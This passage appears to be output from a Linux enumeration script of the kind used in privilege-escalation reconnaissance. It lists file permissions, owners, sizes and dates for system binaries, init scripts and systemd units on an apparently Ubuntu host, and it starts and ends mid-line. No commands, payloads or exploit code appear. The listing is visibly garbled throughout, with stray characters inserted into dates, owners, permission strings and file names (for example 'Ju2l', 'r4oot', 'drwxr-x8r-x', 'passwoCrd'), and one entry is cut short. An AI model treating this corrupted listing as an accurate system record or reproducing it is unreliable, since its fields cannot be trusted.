Apr 3 2012 /bin/bash -rwxr-xr-x 1 root root 326224 Jul 18 2017 /lib/systemd/systemd-journald -rwxr-xr-x 1 root root 618520 Jul 18 2017 /lib/systemd/systemd-logind -rwxr-xr-x 1 root root 141904 Jul 18 2017 /lib/systemd/systemd-timesyncd -rwxr-xr-x 1 root root 453240 Jul 18 2017 /lib/systemd/system.d-udevd -rwxr-xr-x 1 root root 44104 Jun 14 2017 /sbin/agetty lrwxrwxrwx 1 root root 20 Jul 18 2017 /sbin/init -> /lib/systemd/systemd -rwxr-xr-x 1 root root 783984 Jul 26 2017 /sbin/iscsid -rwxr-xr-x 1 root root 51336 Apr 16 2016 /sbin/lvmetad -rwxr-xr-x 1 root root 513216 Feb 20 2017 /sbin/mdadm -rwxr-xr-x 1 root root 224208 Jan 12 2017 /usr/bin/dbus-daemon -rwxr-xr-x 1 root root 18504 Jul 5 2017 /usr/bin/lxcfs -rwxr-xr-x 1 root root 44528 Feb 9 2017 /usr/bin/vmtoolsd -rwxr-xr-x 1 root root 164928 Nov 3 2016 /usr/lib/accountsservice/accounts-daemon -rwxr-xr-x 1 root root 15048 Jan 17 2016 /usr/lib/policykit-1/polkitd -rwxr-xr-x 1 root root 20031344 Aug 31 2017 /usr/lib/snapd/snapd -rwxr-xr-x 1 root root 48112 Apr 8 2016 /usr/sbin/acpid -rwxr-xr-x 1 root root 662496 Sep 18 2017 /usr/sbin/apache2 -rwxr-xr-x 1 root root 26632 Jan 14 2016 /usr/sbin/atd -rwxr-xr-x 1 root root 44472 Apr 5 2016 /usr/sbin/cron -rwxr-xr-x 1 root root 599328 Apr 5 / 2016 /usr/sbin/rsyslogd -rwxr-xr-x 1 root root 799216 Mar 16 2017 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 316 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 1183 Sep 22 2017 .depend.boot -rw-r--r-- 1 root root 1020 Sep 22 2017 .depend.start -rw-r--r-- 1 root root 1167 Sep 22 2017 .depend.stop -rw-r--r-- 1 root root 2427 Jan 19 2016 README -rwxr-xr-x 1 root root 2243 Feb 9 2016 acpid -rwxr-xr-x 1 root root 2210 Apr 5 2016 apache-htcacheclean -rwxr-xr-x 1 root root 8087 Apr 5 2016 apache2 -rwxr-xr-x 1 root root 6223 Mar 3 2017 apparmor -rwxr-xr-x 1 root root 2799 Mar 31 2016 apport -rwxr-xr-x 1 root root 1071 Dec 6 2015 atd -rwxr-xr-x 1 root root 1275 Jan 19 2016 bootmisc.sh -rwxr-xr-x 1 root root 3807 Jan 19 2016 checkfs.sh -rwxr-xr-x 1 root root 1098 Jan 19 2016 checkroot-bootclean.sh -rwxr-xr-x 1 root root 9353 Jan 19 2016 checkroot.sh -rwxr-xr-x 1 root root 1343 Apr 4 2016 console0-setup -rwxr-xr-x 1 root root 3049 Apr 5 2016 cron -rwxr-xr-x 1 root root 937 Mar 28 2015 cryptdisks -rwxr-xr-x 1 root root 896 Mar 28 2015 cryptdisks-early -rwxr-xr-x 1 root root 2813 Dec 1 2015 dbus -rwxr-xr-x 1 root root 1105 Mar 15 2016 grub-common -rwxr-xr-x 1 root root 1336 Jan 19 2016 halt -rwxr-xr-x 1 root root 1423 Jan 19 2016 hostname.sh -rwxr-xr-x 1 root root 3809 Mar 12 2016 hwclock.sh -rwxr-xr-x 1 root root 2372 Apr 11 2016 irqbalance -rwxr-xr-x 1 root root 1503 Mar 29 2016 iscsid -rwxr-xr-x 1 root root 1804 Apr 4 2016 keyboard-setup.dpkg-bak -rwxr-xr-x 1 root root 1300 Jan 19 2016 killprocs -rwxr-xr-x 1 root root 2087 Dec 20 2015 kmod -rwxr-xr-x 1 root root 695 Oct 30 2015 lvm2 -rwxr-xr-x 1 root root 571 Oct 30 2015 lvm2-lvmetad -rwxr-xr-x 1 root root 586 Oct 30 2015 lvm2-lvmpolld -rwxr-xr-x 1 root root 2300 Jun 29 2016 lxcfs -rwxr-xr-x 1 root root 2541 Jun 30 2016 lxd -rwxr-xr-x 1 root root 2611 Apr 11 2016 mdadm -rwxr-xr-x 1 root root 1199 Jul1 16 2014 mdadm-waitidle -rwxr-xr-x 1 root root 703 Jan 19 2016 mountall-bootclean.sh -rwxr-xr-x 1 root root 2301 Jan 19 2016 mountall.sh -rwxr-xr-x 1 root root 1461 Jan 19 2016 mountdevsubfs.sh -rwxr-xr-x 1 root root 1564 Jan 19 2016 mountkernfs.sh -rwxr-xr-x 1 root root 711 Jan 19 2016 mountnfs-bootclean.sh -rwxr-xr-x 1 root root 2456 Jan 19 2016 mountnfs.sh -rwxr-xr-x 1 root root 4771 Jul 19 2015 networking -rwxr-xr-x 1 root root 1581 Oct 15 2015 ondemand -rwxr-xr-x 1 root root 2503 Mar 29 2016 open-iscsi -rwxr-xr-x 1 root root 1578 Mar 29 2016 open-vm-tools -rwxr-xr-x 1 root root 1366 Nov 15 2015 plymouth -rwxr-xr-x 1 root root 752 Nov 15 2015 plymouth-log -rwxr-xr-x 1 root root 1192 Sep 6 2015 procps -rwxr-xr-x 1 root root 6366 Jan 19 2016 rc -rwxr-xr-x 1 root root 820 Jan 19 2016 rc.local -rwxr-xr-x 1 root root 117 Jan 19 2016 rcS -rwxr-xr-x 1 root root 661 Jan 19 2016 reboot -rwxr-xr-x 1 root root 4149 Nov 23 2015 resolvconf -rwxr-xr-x 1 root root 4355 Ju2l 10 2014 rsync -rwxr-xr-x 1 root root 2796 Feb 3 2016 rsyslog -rwxr-xr-x 1 root root 1226 Jun 9 2015 screen-cleanup -rwxr-xr-x 1 root root 3927 Jan 19 2016 sendsigs -rwxr-xr-x 1 root root 597 Jan 19 2016 single -rw-r--r-- 1 root root 1087 Jan 19 2016 skeleton -rwxr-xr-x 1 root root 4077 Apr 27 2016 ssh -rwxr-xr-x 1 root root 6087 Apr 12 2016 udev -rwxr-xr-x 1 root root 2049 Aug 7 2014 ufw -rwxr-xr-x 1 root root 2737 Jan 19 2016 umountfs -rwxr-xr-x 1 root root 2202 Jan 19 2016 umountnfs.sh -rwxr-xr-x 1 root root 1879 Jan 19 2016 umountroot -rwxr-xr-x 1 root root 1391 Apr 20 2017 unattended-upgrades -rwxr-xr-x 1 root root 3111 Jan 19 2016 urandom -rwxr-xr-x 1 root root 1306 May 26 2016 uuidd [-] /etc/init/ config file permissions: total 152 drwxr-xr-x 2 root root 4096 Sep 22 2017 . drwxr-xr-x 90 root root 4096 Sep 22 2017 .. -rw-r--r-- 1 root root 338 Apr 8 2016 acpid.conf -rw-r--r-- 1 root root 3709 Mar 3 2017 apparmor.conf -rw-r--r-- 1 root root 1626 May 18 32016 apport.conf -rw-r--r-- 1 root root 250 Apr 4 2016 console-font.conf -rw-r--r-- 1 root root 509 Apr 4 2016 console-setup.conf -rw-r--r-- 1 root root 297 Apr 5 2016 cron.conf -rw-r--r-- 1 root root 412 Mar 28 2015 cryptdisks-udev.conf -rw-r--r-- 1 root root 1519 Mar 28 2015 cryptdisks.conf -rw-r--r-- 1 root root 482 Sep 1 2015 dbus.conf -rw-r--r-- 1 root root 1247 Jun 1 2015 friendly-recovery.conf -rw-r--r-- 1 root root 284 Jul 23 2013 hostname.conf -rw-r--r-- 1 root root 300 May 21 2014 hostname.sh.conf -rw-r--r-- 1 root root 561 Mar 14 2016 hwclock-save.conf -rw-r--r-- 1 root root 674 Mar 14 2016 hwclock.conf -rw-r--r-- 1 root root 109 Mar 14 2016 hwclock.sh.conf -rw-r--r-- 1 root root 597 Apr 11 2016 irqbalance.conf -rw-r--r-- 1 root root 689 Aug 20 2015 kmod.conf -rw-r--r-- 1 root root 540 Jun 29 2016 lxcfs.conf -rw-r--r-- 1 root root 813 Jun 30 2016 lxd.conf -rw-r--r-- 1 root root 530 Jun 2 2015 network-interface-container.conf -rw-r--r-- 1 r4oot root 1756 Jun 2 2015 network-interface-security.conf -rw-r--r-- 1 root root 933 Jun 2 2015 network-interface.conf -rw-r--r-- 1 root root 2493 Jun 2 2015 networking.conf -rw-r--r-- 1 root root 568 Feb 1 2016 passwd.conf -rw-r--r-- 1 root root 363 Jun 5 2014 procps-instance.conf -rw-r--r-- 1 root root 119 Jun 5 2014 procps.conf -rw-r--r-- 1 root root 457 Jun 3 2015 resolvconf.conf -rw-r--r-- 1 root root 426 Dec 2 2015 rsyslog.conf -rw-r--r-- 1 root root 230 Apr 4 2016 setvtrgb.conf -rw-r--r-- 1 root root 641 Apr 27 2016 ssh.conf -rw-r--r-- 1 root root 337 Apr 12 2016 udev.conf -rw-r--r-- 1 root root 360 Apr 12 2016 udevmonitor.conf -rw-r--r-- 1 root root 352 Apr 12 2016 udevtrigger.conf -rw-r--r-- 1 root root 473 Aug 7 2014 ufw.conf -rw-r--r-- 1 root root 683 Feb 24 2015 ureadahead-other.conf -rw-r--r-- 1 root root 889 Feb 24 2015 ureadahead.conf [-] /lib/systemd/* config file permissions: /lib/systemd/: total 8.3M drwxr-xr-x 27 root root 36K Sep5 22 2017 system drwxr-xr-x 2 root root 4.0K Sep 22 2017 network drwxr-xr-x 2 root root 4.0K Sep 22 2017 system-generators drwxr-xr-x 2 root root 4.0K Sep 22 2017 system-preset drwxr-xr-x 2 root root 4.0K Sep 22 2017 system-sleep -rwxr-xr-x 1 root root 443K Jul 18 2017 systemd-udevd -rwxr-xr-x 1 root root 828K Jul 18 2017 systemd-networkd -rwxr-xr-x 1 root root 31K Jul 18 2017 systemd-reply-password -rwxr-xr-x 1 root root 91K Jul 18 2017 systemd-rfkill -rwxr-xr-x 1 root root 143K Jul 18 2017 systemd-shutdown -rwxr-xr-x 1 root root 71K Jul 18 2017 systemd-sleep -rwxr-xr-x 1 root root 91K Jul 18 2017 systemd-backlight -rwxr-xr-x 1 root root 47K Jul 18 2017 systemd-binfmt -rwxr-xr-x 1 root root 301K Jul 18 2017 systemd-fsck -rwxr-xr-x 1 root root 276K Jul 18 2017 systemd-initctl -rwxr-xr-x 1 root root 319K Jul 18 2017 systemd-journald -rwxr-xr-x 1 root root 605K Jul 18 2017 systemd-logind -rwxr-xr-x 1 root root 51K Jul 18 2017 systemd-modules-load -rwxr-xr-x 1 root ro6ot 35K Jul 18 2017 systemd-random-seed -rwxr-xr-x 1 root root 333K Jul 18 2017 systemd-timedated -rwxr-xr-x 1 root root 35K Jul 18 2017 systemd-user-sessions -rwxr-xr-x 1 root root 15K Jul 18 2017 systemd-ac-power -rwxr-xr-x 1 root root 268K Jul 18 2017 systemd-cgroups-agent -rwxr-xr-x 1 root root 332K Jul 18 2017 systemd-hostnamed -rwxr-xr-x 1 root root 123K Jul 18 2017 systemd-networkd-wait-online -rwxr-xr-x 1 root root 35K Jul 18 2017 systemd-quotacheck -rwxr-xr-x 1 root root 653K Jul 18 2017 systemd-resolved -rwxr-xr-x 1 root root 139K Jul 18 2017 systemd-timesyncd -rwxr-xr-x 1 root root 276K Jul 18 2017 systemd-update-utmp -rwxr-xr-x 1 root root 1.6M Jul 18 2017 systemd -rwxr-xr-x 1 root root 55K Jul 18 2017 systemd-activate -rwxr-xr-x 1 root root 103K Jul 18 2017 systemd-bootchart -rwxr-xr-x 1 root root 352K Jul 18 2017 systemd-bus-proxyd -rwxr-xr-x 1 root root 91K Jul 18 2017 systemd-cryptsetup -rwxr-xr-x 1 root root 340K Jul 18 2017 systemd-localed -rwxr-xr-x7 1 root root 51K Jul 18 2017 systemd-remount-fs -rwxr-xr-x 1 root root 51K Jul 18 2017 systemd-sysctl -rwxr-xr-x 1 root root 75K Jul 18 2017 systemd-fsckd -rwxr-xr-x 1 root root 31K Jul 18 2017 systemd-hibernate-resume -rwxr-xr-x 1 root root 91K Jul 18 2017 systemd-socket-proxyd -rwxr-xr-x 1 root root 1.3K Jul 5 2017 systemd-sysv-install drwxr-xr-x 2 root root 4.0K Apr 12 2016 system-shutdown /lib/systemd/system: total 940K drwxr-xr-x 2 root root 4.0K Sep 22 2017 apache2.service.d drwxr-xr-x 2 root root 4.0K Sep 22 2017 halt.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 initrd-switch-root.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 kexec.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 reboot.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 sockets.target.wants drwxr-x8r-x 2 root root 4.0K Sep 22 2017 getty.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 graphical.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 rescue.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 resolvconf.service.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 sigpwr.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 timers.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 rc-local.service.d drwxr-xr-x 2 root root 4.0K Sep 22 2017 systemd-timesyncd.service.d drwxr-xr-x 2 root root 4.0K Sep 22 2017 busnames.target.wants drwxr-xr-x 2 root root 4.0K Sep 22 2017 systemd-resolved.service.d lrwxrwxrwx 1 root root 9 Sep 22 2017 screen-cleanup.service -> /dev/null lrwxrwxrwx 1 root root 27 Sep 13 2017 plymouth-log.service -> plymouth-read-write.service lrwxrwxrwx 1 root root 21 Sep 13 2017 plymouth.service -> plymouth-quit.service -rw-r--r-- 1 root root 412 Sep 13 2017 plymouth-halt.service -rw-r-9-r-- 1 root root 426 Sep 13 2017 plymouth-kexec.service -rw-r--r-- 1 root root 421 Sep 13 2017 plymouth-poweroff.service -rw-r--r-- 1 root root 200 Sep 13 2017 plymouth-quit-wait.service -rw-r--r-- 1 root root 194 Sep 13 2017 plymouth-quit.service -rw-r--r-- 1 root root 244 Sep 13 2017 plymouth-read-write.service -rw-r--r-- 1 root root 416 Sep 13 2017 plymouth-reboot.service -rw-r--r-- 1 root root 532 Sep 13 2017 plymouth-start.service -rw-r--r-- 1 root root 291 Sep 13 2017 plymouth-switch-root.service -rw-r--r-- 1 root root 490 Sep 13 2017 systemd-ask-password-plymouth.path -rw-r--r-- 1 root root 467 Sep 13 2017 systemd-ask-password-plymouth.service -rw-r--r-- 1 root root 193 Aug 31 2017 snap-repair.service -rw-r--r-- 1 root root 221 Aug 31 2017 snap-repair.timer -rw-r--r-- 1 root root 192 Aug 31 2017 snapd.autoimport.service -rw-r--r-- 1 root root 368 Aug 31 2017 snapd.core-fixup.service -rw-r--r-- 1 root root 290 Aug 31 2017 snapd.refresh.service -rw-r--r-- 1 root root 32:3 Aug 31 2017 snapd.refresh.timer -rw-r--r-- 1 root root 308 Aug 31 2017 snapd.service -rw-r--r-- 1 root root 281 Aug 31 2017 snapd.socket -rw-r--r-- 1 root root 474 Aug 31 2017 snapd.system-shutdown.service -rw-r--r-- 1 root root 683 Aug 22 2017 lxd.service -rw-r--r-- 1 root root 206 Aug 22 2017 lxd-bridge.service -rw-r--r-- 1 root root 318 Aug 22 2017 lxd-containers.service -rw-r--r-- 1 root root 197 Aug 22 2017 lxd.socket lrwxrwxrwx 1 root root 21 Jul 18 2017 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 14 Jul 18 2017 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Jul 18 2017 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 ;2017 checkroot.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Jul 18 2017 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Jul 18 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Jul 18 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Jul 18 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 24 Jul 18 2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service lrwxrwxrwx 1 root root 24 Jul 18 2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service lrwxrwxrwx 1 root root 25 Jul 18 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service lrwxrwxrwx 1 root root 16 Jul 18 2017 default.target -> graphical.target lrwxrot root 13 Jul 18 2017 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Jul 18 2017 sendsigs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 stop-bootlogd-single.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Jul 18 2017 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Jul 18 2017 urandom.service -> systemd-random-seed.service lrwxrwxrwx 1 root root 9 Jul 18 2017 x11-common.service -> /dev/null -rw-r--r-- 1 root root 403 Jul 18 2017 -.slice -rw-r--r-- 1 root root 879 Jul 18 2017 basic.target -rw-r--r-- 1 root root 379 Jul 18 2017 bluetooth.target -rw-r--r-- 1 root root 358 Jul 18 2017 busnames.target -rw-r--r-- 1 root root 770 Jul 18 ?2017 console-getty.service -rw-r--r-- 1 root root 742 Jul 18 2017 console-shell.service -rw-r--r-- 1 root root 791 Jul 18 2017 container-getty@.service -rw-r--r-- 1 root root 394 Jul 18 2017 cryptsetup-pre.target -rw-r--r-- 1 root root 366 Jul 18 2017 cryptsetup.target -rw-r--r-- 1 root root 1010 Jul 18 2017 debug-shell.service -rw-r--r-- 1 root root 670 Jul 18 2017 dev-hugepages.mount -rw-r--r-- 1 root root 624 Jul 18 2017 dev-mqueue.mount -rw-r--r-- 1 root root 1009 Jul 18 2017 emergency.service -rw-r--r-- 1 root root 431 Jul 18 2017 emergency.target -rw-r--r-- 1 root root 501 Jul 18 2017 exit.target -rw-r--r-- 1 root root 440 Jul 18 2017 final.target -rw-r--r-- 1 root root 460 Jul 18 2017 getty.target -rw-r--r-- 1 root root 1.5K Jul 18 2017 getty@.service -rw-r--r-- 1 root root 558 Jul 18 2017 graphical.target -rw-r--r-- 1 root root 487 Jul 18 2017 halt.target -rw-r--r-- 1 root root 447 Jul 18 2017 hibernate.target -rw-r--r-- 1 root root 468 Jul 18 2017 hybrid-sleep.targ@et -rw-r--r-- 1 root root 630 Jul 18 2017 initrd-cleanup.service -rw-r--r-- 1 root root 553 Jul 18 2017 initrd-fs.target -rw-r--r-- 1 root root 790 Jul 18 2017 initrd-parse-etc.service -rw-r--r-- 1 root root 526 Jul 18 2017 initrd-root-fs.target -rw-r--r-- 1 root root 640 Jul 18 2017 initrd-switch-root.service -rw-r--r-- 1 root root 691 Jul 18 2017 initrd-switch-root.target -rw-r--r-- 1 root root 664 Jul 18 2017 initrd-udevadm-cleanup-db.service -rw-r--r-- 1 root root 671 Jul 18 2017 initrd.target -rw-r--r-- 1 root root 501 Jul 18 2017 kexec.target -rw-r--r-- 1 root root 677 Jul 18 2017 kmod-static-nodes.service -rw-r--r-- 1 root root 395 Jul 18 2017 local-fs-pre.target -rw-r--r-- 1 root root 507 Jul 18 2017 local-fs.target -rw-r--r-- 1 root root 405 Jul 18 2017 machine.slice -rw-r--r-- 1 root root 473 Jul 18 2017 mail-transport-agent.target -rw-r--r-- 1 root root 492 Jul 18 2017 multi-user.target -rw-r--r-- 1 root root 464 Jul 18 2017 network-online.target -rw-r--r-- 1 rooAt root 461 Jul 18 2017 network-pre.target -rw-r--r-- 1 root root 480 Jul 18 2017 network.target -rw-r--r-- 1 root root 514 Jul 18 2017 nss-lookup.target -rw-r--r-- 1 root root 473 Jul 18 2017 nss-user-lookup.target -rw-r--r-- 1 root root 354 Jul 18 2017 paths.target -rw-r--r-- 1 root root 552 Jul 18 2017 poweroff.target -rw-r--r-- 1 root root 377 Jul 18 2017 printer.target -rw-r--r-- 1 root root 693 Jul 18 2017 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 603 Jul 18 2017 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 568 Jul 18 2017 quotaon.service -rw-r--r-- 1 root root 612 Jul 18 2017 rc-local.service -rw-r--r-- 1 root root 543 Jul 18 2017 reboot.target -rw-r--r-- 1 root root 396 Jul 18 2017 remote-fs-pre.target -rw-r--r-- 1 root root 482 Jul 18 2017 remote-fs.target -rw-r--r-- 1 root root 978 Jul 18 2017 rescue.service -rw-r--r-- 1 root root 486 Jul 18 2017 rescue.target -rw-r--r-- 1 root root 500 Jul 18 2017 rpcbind.target -rw-r--r-- 1 root root 1.1KB Jul 18 2017 serial-getty@.service -rw-r--r-- 1 root root 402 Jul 18 2017 shutdown.target -rw-r--r-- 1 root root 362 Jul 18 2017 sigpwr.target -rw-r--r-- 1 root root 420 Jul 18 2017 sleep.target -rw-r--r-- 1 root root 409 Jul 18 2017 slices.target -rw-r--r-- 1 root root 380 Jul 18 2017 smartcard.target -rw-r--r-- 1 root root 356 Jul 18 2017 sockets.target -rw-r--r-- 1 root root 380 Jul 18 2017 sound.target -rw-r--r-- 1 root root 441 Jul 18 2017 suspend.target -rw-r--r-- 1 root root 353 Jul 18 2017 swap.target -rw-r--r-- 1 root root 715 Jul 18 2017 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 719 Jul 18 2017 sys-kernel-config.mount -rw-r--r-- 1 root root 662 Jul 18 2017 sys-kernel-debug.mount -rw-r--r-- 1 root root 518 Jul 18 2017 sysinit.target -rw-r--r-- 1 root root 1.3K Jul 18 2017 syslog.socket -rw-r--r-- 1 root root 585 Jul 18 2017 system-update.target -rw-r--r-- 1 root root 436 Jul 18 2017 system.slice -rw-r--r-- 1 root root 646 Jul 18 2017 systemd-ask-passwoCrd-console.path -rw-r--r-- 1 root root 653 Jul 18 2017 systemd-ask-password-console.service -rw-r--r-- 1 root root 574 Jul 18 2017 systemd-ask-password-wall.path -rw-r--r-- 1 root root 681 Jul 18 2017 systemd-ask-password-wall.service -rw-r--r-- 1 root root 724 Jul 18 2017 systemd-backlight@.service -rw-r--r-- 1 root root 959 Jul 18 2017 systemd-binfmt.service -rw-r--r-- 1 root root 650 Jul 18 2017 systemd-bootchart.service -rw-r--r-- 1 root root 1.0K Jul 18 2017 systemd-bus-proxyd.service -rw-r--r-- 1 root root 409 Jul 18 2017 systemd-bus-proxyd.socket -rw-r--r-- 1 root root 497 Jul 18 2017 systemd-exit.service -rw-r--r-- 1 root root 674 Jul 18 2017 systemd-fsck-root.service -rw-r--r-- 1 root root 648 Jul 18 2017 systemd-fsck@.service -rw-r--r-- 1 root root 551 Jul 18 2017 systemd-fsckd.service -rw-r--r-- 1 root root 540 Jul 18 2017 systemd-fsckd.socket -rw-r--r-- 1 root root 544 Jul 18 2017 systemd-halt.service -rw-r--r-- 1 root root 631 Jul 18 2017 systemd-hibernate-resume@D.service -rw-r--r-- 1 root root 501 Jul 18 2017 systemd-hibernate.service -rw-r--r-- 1 root root 710 Jul 18 2017 systemd-hostnamed.service -rw-r--r-- 1 root root 778 Jul 18 2017 systemd-hwdb-update.service -rw-r--r-- 1 root root 519 Jul 18 2017 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 480 Jul 18 2017 systemd-initctl.service -rw-r--r-- 1 root root 524 Jul 18 2017 systemd-initctl.socket -rw-r--r-- 1 root root 731 Jul 18 2017 systemd-journal-flush.service -rw-r--r-- 1 root root 607 Jul 18 2017 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.1K Jul 18 2017 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 1.3K Jul 18 2017 systemd-journald.service -rw-r--r-- 1 root root 842 Jul 18 2017 systemd-journald.socket -rw-r--r-- 1 root root 557 Jul 18 2017 systemd-kexec.service -rw-r--r-- 1 root root 691 Jul 18 2017 systemd-localed.service -rw-r--r-- 1 root root 1.2K Jul 18 2017 systemd-logind.service -rw-r--r-- 1 root root 693 Jul 18 2017 systemd-machine-id-commit.servEice -rw-r--r-- 1 root root 967 Jul 18 2017 systemd-modules-load.service -rw-r--r-- 1 root root 685 Jul 18 2017 systemd-networkd-wait-online.service -rw-r--r-- 1 root root 1.3K Jul 18 2017 systemd-networkd.service -rw-r--r-- 1 root root 591 Jul 18 2017 systemd-networkd.socket -rw-r--r-- 1 root root 553 Jul 18 2017 systemd-poweroff.service -rw-r--r-- 1 root root 614 Jul 18 2017 systemd-quotacheck.service -rw-r--r-- 1 root root 717 Jul 18 2017 systemd-random-seed.service -rw-r--r-- 1 root root 548 Jul 18 2017 systemd-reboot.service -rw-r--r-- 1 root root 757 Jul 18 2017 systemd-remount-fs.service -rw-r--r-- 1 root root 907 Jul 18 2017 systemd-resolved.service -rw-r--r-- 1 root root 696 Jul 18 2017 systemd-rfkill.service -rw-r--r-- 1 root root 617 Jul 18 2017 systemd-rfkill.socket -rw-r--r-- 1 root root 497 Jul 18 2017 systemd-suspend.service -rw-r--r-- 1 root root 649 Jul 18 2017 systemd-sysctl.service -rw-r--r-- 1 root root 655 Jul 18 2017 systemd-timedated.service -rw-r--r-- 1 Froot root 1.1K Jul 18 2017 systemd-timesyncd.service -rw-r--r-- 1 root root 598 Jul 18 2017 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 450 Jul 18 2017 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 703 Jul 18 2017 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 683 Jul 18 2017 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 823 Jul 18 2017 systemd-udev-settle.service -rw-r--r-- 1 root root 743 Jul 18 2017 systemd-udev-trigger.service -rw-r--r-- 1 root root 578 Jul 18 2017 systemd-udevd-control.socket -rw-r--r-- 1 root root 570 Jul 18 2017 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 825 Jul 18 2017 systemd-udevd.service -rw-r--r-- 1 root root 757 Jul 18 2017 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 754 Jul 18 2017 systemd-update-utmp.service -rw-r--r-- 1 root root 573 Jul 18 2017 systemd-user-sessions.service -rw-r--r-- 1 root root 395 Jul 18 2017 time-sync.target -rw-r--r-- 1 root root 405 Jul 18 2017 timers.target -rw-Gr--r-- 1 root root 417 Jul 18 2017 umount.target -rw-r--r-- 1 root root 392 Jul 18 2017 user.slice -rw-r--r-- 1 root root 528 Jul 18 2017 user@.service -rw-r--r-- 1 root root 342 Jul 17 2017 getty-static.service -rw-r--r-- 1 root root 153 Jul 17 2017 sigpwr-container-shutdown.service -rw-r--r-- 1 root root 175 Jul 17 2017 systemd-networkd-resolvconf-update.path -rw-r--r-- 1 root root 715 Jul 17 2017 systemd-networkd-resolvconf-update.service -rw-r--r-- 1 root root 311 Jul 5 2017 lxcfs.service -rw-r--r-- 1 root root 202 Jun 19 2017 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 Jun 19 2017 apt-daily-upgrade.timer -rw-r--r-- 1 root root 169 Jun 19 2017 apt-daily.service -rw-r--r-- 1 root root 212 Jun 19 2017 apt-daily.timer -rw-r--r-- 1 root root 189 Jun 14 2017 uuidd.service -rw-r--r-- 1 root root 126 Jun 14 2017 uuidd.socket -rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service -rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service -rw-r--r-- 1 root root 21H6 Mar 16 2017 ssh.socket -rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service -rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service -rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service -rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket -rw-r--r-- 1 root root 420 Dec 7 2016 resolvconf.service -rw-r--r-- 1 root root 735 Nov 30 2016 networking.service -rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service -rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service -rw-r--r-- 1 root root 251 Sep 18 2016 open-vm-tools.service -rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service -rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null -rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service -rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket -rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service -rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket -rw-r--r-- 1 root root 335 Apr 16 2I016 lvm2-lvmpolld.service -rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket -rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service -rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants drwxr-xr-x 2 root root 